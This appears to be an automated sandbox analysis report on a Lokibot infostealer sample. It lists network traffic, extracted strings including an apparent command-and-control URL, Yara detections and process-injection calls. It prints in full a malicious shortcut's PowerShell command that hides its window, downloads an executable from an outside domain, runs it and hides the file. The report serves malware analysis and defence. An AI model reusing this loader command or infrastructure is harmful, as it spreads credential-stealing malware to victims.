Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:51 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:53 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:57 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:34 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:35 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:36 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:39 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:40 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:41 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: screens.pif, 00000005.00000002.2659632439.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, screens.pif, 00000005.00000002.2658959804.000000000049F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
Source: powershell.exe, 00000000.00000002.1487508963.0000027825C2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1487508963.0000027824CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: screens.pif, screens.pif, 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000000.00000002.1487015359.0000027824BD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000000.00000002.1541215638.000002783CF06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1541077857.000002783CD90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co7
Source: powershell.exe, 00000000.00000002.1487508963.00000278255C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sodiumlaurethsulfatedesyroyer.com
Source: powershell.exe, 00000000.00000002.1487508963.0000027824CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1487508963.00000278262FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000000.00000002.1487508963.00000278262FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1487508963.0000027825C2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1487508963.00000278255BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com
Source: powershell.exe, 00000000.00000002.1487060690.0000027824BDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com/N
Source: powershell.exe, 00000000.00000002.1485393170.0000027822A18000.00000004.00000020.00020000.00000000.sdmp, Comprobante.lnk.lnk	String found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
Source: powershell.exe, 00000000.00000002.1541215638.000002783CF06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com/ow

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49706 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: screens.pif PID: 2208, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: screens.pif PID: 688, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

PE file contains section with special chars

Source: screens.pif.0.dr

Static PE information: section name: j1CM!e^U

PE file has nameless sections

Source: screens.pif.0.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\screens.pif

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: Comprobante.lnk.lnk

LNK file: -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';

Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABEDBB0 NtResumeThread,	4_2_0ABEDBB0
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABED9F8 NtReadVirtualMemory,	4_2_0ABED9F8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABEDF28 NtSetContextThread,	4_2_0ABEDF28
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABEDDD0 NtWriteVirtualMemory,	4_2_0ABEDDD0
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABEDBA8 NtResumeThread,	4_2_0ABEDBA8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABED9F0 NtReadVirtualMemory,	4_2_0ABED9F0
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABEDF21 NtSetContextThread,	4_2_0ABEDF21
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABEDDC9 NtWriteVirtualMemory,	4_2_0ABEDDC9

Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D546C0	4_2_02D546C0
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D53760	4_2_02D53760
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D56F28	4_2_02D56F28
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D524D8	4_2_02D524D8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D508E1	4_2_02D508E1
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D5D038	4_2_02D5D038
